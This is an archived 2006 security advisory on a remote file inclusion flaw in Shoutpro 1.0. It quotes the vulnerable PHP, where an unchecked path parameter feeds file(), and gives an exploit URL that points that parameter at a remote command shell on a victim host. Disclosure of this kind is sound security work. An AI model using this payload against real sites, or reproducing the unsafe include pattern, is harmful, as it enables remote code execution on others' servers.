Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13180
HistoryJun 15, 2006 - 12:00 a.m.

Shoutpro 1.0 Version - Remote File Include Vulnerability

2006-06-1500:00:00
vulners.com
6

SaVSaK.CoM | SpC-x - The_BeKiR |

Shoutpro 1.0 Version - Remote File Include Vulnerability

Risk : High

Class: Remote

Script : Shoutpro

Credits : SpC-x

Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx

Code :

include("config.php");

include("functions.php");

if ($path){

$ips = file("$path/lists/bannedips.php");

} else {

$ips = file("lists/bannedips.php");

}

if (in_array($REMOTE_ADDR,$ips)) {

echo($bannedmessage);

die;

}

Vulnerable :

http://www.victim.com/Shoutpro/include.php?path=Command-Shell